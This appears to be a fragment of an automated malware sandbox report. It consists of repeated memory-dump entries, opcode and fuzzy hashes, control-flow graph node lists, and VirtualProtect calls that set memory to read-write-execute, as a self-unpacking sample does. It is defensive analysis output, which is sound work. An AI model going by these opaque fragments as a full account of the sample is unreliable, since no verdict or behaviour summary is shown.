                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: W
                                                                                                                                                                                                                                                                                                • API String ID: 0-3182507374

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                                                                                                • String ID: W
                                                                                                                                                                                                                                                                                                • API String ID: 621844428-3182507374
                                                                                                                                                                                                                                                                                                • Opcode ID: 501e83d59178df0b0a80c3187e76ce94cff30d37e009e8dd16e924155f1b81be
                                                                                                                                                                                                                                                                                                • Instruction ID: 9ddd6951fc924a91401a4bf615135f3147cac00f1cf5976cceabd4da6fbd5488
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 501e83d59178df0b0a80c3187e76ce94cff30d37e009e8dd16e924155f1b81be
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A141F6F6D042249FF7209A10DC85BEB7B78EB84311F0540BBE90D96281D67D6EC58E62

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 740 44fbc9-44fbec 741 44fbee-44fbf8 740->741 742 44fbfa-44fc51 740->742 743 44fc69-44fc70 741->743 748 44fc53-44fc5d 742->748 749 44fc5f 742->749 746 44fc80 743->746 747 44fc72-44fc7e 743->747 750 44fc91-44fcbc VirtualProtect 746->750 747->750 748->743 749->743 752 44fcfc-44fd02 750->752 753 44fcbe-44fcfa 750->753 754 44fd08-44fd0f 752->754 753->754 755 44fd11-44fd43 call 44fd24 call 44fd3f 754->755 756 44fd48-44feec call 44feed 754->756 765 450291-45068a call 45036d call 450673 755->765 756->765 777 450690-450804 call 450805 765->777 778 450f9c-4510ac call 450fac call 450fc2 call 4510bb 765->778
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00001BDD), ref: 0044FCB4
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 32de7649a281385f7957d886cbe8883e5962b7a1885297b56dc8ba8ddf07b3be
                                                                                                                                                                                                                                                                                                • Instruction ID: 4688688dd30b72f27e1b35f0a31bd08ad5d8ec2608884f7fd3f61d24e9d7606b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32de7649a281385f7957d886cbe8883e5962b7a1885297b56dc8ba8ddf07b3be
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51A1D871D085A88AFB248724DC447EA7BB5EF51304F1480FAC84D57282DA7E5FC98F66

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 795 43925c-4392ca 797 4392db-4392ec 795->797 798 4392f2-439302 797->798 799 43938d-4393de 797->799 798->799 800 439308-439359 798->800 801 4393e0-4393ea 799->801 802 4393ec-439443 call 43941a 799->802 803 43935b-43937d 800->803 804 43937f 800->804 805 43945b-439462 801->805 812 439451 802->812 813 439445-43944f 802->813 803->804 809 439386 803->809 804->797 807 439472 805->807 808 439464-439470 805->808 814 439483-43948a 807->814 808->814 809->799 812->805 813->805 815 439490-43951b 814->815 816 43955e-439c43 call 4395e6 call 4398ff call 439918 814->816 815->816 831 43951d-439559 call 43954b 815->831 836 439c49-439ca6 call 439c6b VirtualProtect 816->836 831->836 845 439ca8-439ce6 836->845 846 439cee-439d40 call 439d41 836->846 845->846
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 8d6c17fe567b0a46e6eef871445af585baa96369f9b6f305768fb6d38bdc3837
                                                                                                                                                                                                                                                                                                • Instruction ID: 3fd5625bcae63fdf1705e882e060ab3650930da0f141cacb6debeb2bc2d750eb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d6c17fe567b0a46e6eef871445af585baa96369f9b6f305768fb6d38bdc3837
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E99118B2D045289BEB24CA14CCD4AEB77B5EB84311F1491FAD84D62280DA7C6FC2CF95

Control-flow Graph (figure not reproduced; legend: Executed / Not Executed)
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00000C70,?,?,004398F4,?,?,?,?,?,00000000,?,0043962C), ref: 00439C9E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 4685a9bd32438aa35cf74ccdfbac0aab84972b5c8e00f71b64a9273c2ef0a195
                                                                                                                                                                                                                                                                                                • Instruction ID: a4a4f988380392004f738fe2286c6b575df809d38f264b81318ed9f9701a64e0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4685a9bd32438aa35cf74ccdfbac0aab84972b5c8e00f71b64a9273c2ef0a195
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D58115B2D046289BF7248B14DC84AEBB774FF84310F1151BAE84D67280E67D5FC68E96
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00000C70,?,?,004398F4,?,?,?,?,?,00000000,?,0043962C), ref: 00439C9E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: b97a245955e9697e30ce8775037ed49f309bdd760a86aa50fceda0ea5d53973b
                                                                                                                                                                                                                                                                                                • Instruction ID: 68eec6d4c48b026fb447748f2eac236c10be9a9eb6ecbdd51dbcb32dabf73732
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b97a245955e9697e30ce8775037ed49f309bdd760a86aa50fceda0ea5d53973b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB7126B2D006299BF7248B14DC84AEBB775FF84310F1051BAE84DA7640E67D1FC28E96
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 6c1fda05b6bffb3d7f1498c3e952808733eab8863780d431a016247af6c71828
                                                                                                                                                                                                                                                                                                • Instruction ID: abd29a1015d559b113e014c9428e8be53776c6b5e353e8f7dd93c93bb594a027
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c1fda05b6bffb3d7f1498c3e952808733eab8863780d431a016247af6c71828
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD6149B2D006299BF7248B54DC84AEBB774FF94310F1541BAE84DA7640E67D1FC28E92
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 2002c727d5308a0fd1781aead3027e254008a77d52e67f2fbfe9270f5d6b0595
                                                                                                                                                                                                                                                                                                • Instruction ID: f8146c05fe8c4734bdf3a43265f584f47094c3d125935100d234c13a24ec2489
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2002c727d5308a0fd1781aead3027e254008a77d52e67f2fbfe9270f5d6b0595
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 776105B2D006299AF7248B55DC44AEBB774FF94311F1041BAE84D67280E67D1EC28E92
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00000C70,?,?,004398F4,?,?,?,?,?,00000000,?,0043962C), ref: 00439C9E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 22d554c5dea25d84e1b9832b73cb91cd2bf611b0c7a40566954d2823d04cda73
                                                                                                                                                                                                                                                                                                • Instruction ID: 2ce15c870844172f06cdac1138b78d88d52bcb9eec1845cb16620768a15bead4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 22d554c5dea25d84e1b9832b73cb91cd2bf611b0c7a40566954d2823d04cda73
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F71D0B2D056289BE7208B10CC81AEAB779FF84300F1551FAD84D67241D6785EC6CF46
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00000C70,?,?,004398F4,?,?,?,?,?,00000000,?,0043962C), ref: 00439C9E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: a70d30e3f3b75511c952734a9120023184fcacd2ed169db5a50dd3ce25d55133
                                                                                                                                                                                                                                                                                                • Instruction ID: 4b72825226c6584f60de9c45d427f05070365422e34b6a52c30d0db9cea1611d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a70d30e3f3b75511c952734a9120023184fcacd2ed169db5a50dd3ce25d55133
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A510FB1E052199FEB24CB14CC90AEAB7B5EF88300F1491EAD94D67241C6796FC2CF51
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00000C70,?,?,004398F4,?,?,?,?,?,00000000,?,0043962C), ref: 00439C9E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 3a359ee2a3b03e90d081b30936bbb9807928d439a71d6ea281ba6fb85533bc12
                                                                                                                                                                                                                                                                                                • Instruction ID: 754dadfcd19874b5023fa138790869bafb464d15de48b8353ee1bab91003d90e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a359ee2a3b03e90d081b30936bbb9807928d439a71d6ea281ba6fb85533bc12
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F514AB2D045259BF7248A04CC85AEB7779EB94310F1451FBD84E52240D67C1FC78F56
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 802b0a211486bef0cc98051e0102cd016ceaa11f3b5be1bf398ba9f457cc0077
                                                                                                                                                                                                                                                                                                • Instruction ID: e888e7339d9df3a6bbadaed361dd43901289f0749b2527cda9d436d033705ab7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 802b0a211486bef0cc98051e0102cd016ceaa11f3b5be1bf398ba9f457cc0077
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A4147B2E056199FF7108A15CC95AEBB778EBC5300F1150FAD84E67281D67C1FC28E52
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 4dfd546009c68192daa57f0101370b962118b4f4a7354da4f17bbd8a721f372b
                                                                                                                                                                                                                                                                                                • Instruction ID: aabc0c232bf1433f6aaec411c4e83b68c44377d7b4ea5ca0978e70ecec76a48d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4dfd546009c68192daa57f0101370b962118b4f4a7354da4f17bbd8a721f372b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B54125B2E056199FFB208A11DC95AEBB778EBC5310F1151FAD44E27281D67C1FC28E92
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: a79fdf18a5b6b7156cdcf8ac230ccb7ef05a696dbf99d12399f7b7309692736e
                                                                                                                                                                                                                                                                                                • Instruction ID: c7ac164e5441c9154275cdfc79dd59a2a418125cd8dd6e6e03baeee758ed4725
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a79fdf18a5b6b7156cdcf8ac230ccb7ef05a696dbf99d12399f7b7309692736e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06417AB2D05515ABF7248A14CC45AEB7779EB94310F1450BFE84E52240D6BC1FC78FA6
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 1d63f9853c601a332c09d70dadf74749b9190102c80af950c79679dccfbcee13
                                                                                                                                                                                                                                                                                                • Instruction ID: 1345a6211f0fe84e35c74fe35573f94a53755804c98c89c4ad291533f2b15653
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d63f9853c601a332c09d70dadf74749b9190102c80af950c79679dccfbcee13
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC415AB2D05515ABF7248A14CC45AEB7779EB94310F1450BFE84E52240D6BC1FC78FA6
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: d87d273e5deaa31aa89f561b0c773f875e572ef548cf36e417c327a24d17bb18
                                                                                                                                                                                                                                                                                                • Instruction ID: d5d9cf05a643e3b4489e46a6efab9cb9c8e8a93499dc35cf3c9c00847b662aa1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d87d273e5deaa31aa89f561b0c773f875e572ef548cf36e417c327a24d17bb18
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3417AB2D05515ABF7248A04CC45AEB7779EB94310F2450BFE84E52240D6BC1FC78FA6
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: fb05cb89a7dbef9a4c2ea1285af9003b43956c5b57a1429f14e938349e907f0d
                                                                                                                                                                                                                                                                                                • Instruction ID: 4e28582e9f37416d6620b13804a8a356790ebfb193c8f743acc56a859577dba6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb05cb89a7dbef9a4c2ea1285af9003b43956c5b57a1429f14e938349e907f0d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 304145F2D056199FFB108A10CC85AEAB778EB84310F1451FAE88D56241D67D5FC28E92
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 9e5c761747b375fc94473b918c0e498071484eaf78b83f18d7d5563da748537a
                                                                                                                                                                                                                                                                                                • Instruction ID: a22c5855b130839aa5ea06fd94acba7f6c38059715d5cb9de43f847702a0b89a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e5c761747b375fc94473b918c0e498071484eaf78b83f18d7d5563da748537a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D4115B2D056199FFB108A10DC916EAB774EF85311F1450FAD88E56281D67D1FC28F92
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 0aaf206436fa3c15d218b4788ae1765f30cab5cbcdd0cb4d24f3e27ccfaa5e97
                                                                                                                                                                                                                                                                                                • Instruction ID: 7155ced1e007b9811f0e782bf11fc2934cb1b7a2a226f842295014da7c971605
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0aaf206436fa3c15d218b4788ae1765f30cab5cbcdd0cb4d24f3e27ccfaa5e97
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A3167F2E046059BF7104610DC85BFB7778EB94310F1551BBE84D66680D6BD1FC68AA3
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: f731217ea9f8f704d0cbe56732fdc500aa125ff806119307986490eef3a747f3
                                                                                                                                                                                                                                                                                                • Instruction ID: 3fdb2582a6fee50b8612c733ffed797f7fbc1b7b1a16fde736f690a0660f0df4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f731217ea9f8f704d0cbe56732fdc500aa125ff806119307986490eef3a747f3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C3156B2E051259BF7108A14CC819EB7778EB95310F1450BBE88E93240D67C5FC38BA6
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 64001f0b2acd8699ba6bb63dade8278e362b6afcc99eba18a2d7af10716f12ec
                                                                                                                                                                                                                                                                                                • Instruction ID: 959cc9230c31591e63b45458d00b5b109799a9c521592869f93e0c5404157b9f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 64001f0b2acd8699ba6bb63dade8278e362b6afcc99eba18a2d7af10716f12ec
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE4197F2E046099BF7108A50DC84AEA7378FBD4310F1541BAE84D9B681D3BC4FC28A62
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00000C70,?,?,004398F4,?,?,?,?,?,00000000,?,0043962C), ref: 00439C9E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 0313432ffed0d27c8fc2de188b9f8b803c85bbb3c0cced9e0fe7f866fac2f831
                                                                                                                                                                                                                                                                                                • Instruction ID: 7d134417d5cf3b58ebf2f20ab3cfe2bf1cbf4addf1e85288463b706f11d21e21
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0313432ffed0d27c8fc2de188b9f8b803c85bbb3c0cced9e0fe7f866fac2f831
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B93166F2E056099BF7104650DC85BFA7378EBD4311F2551BAE44D66680D2BD1FC28EA2
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
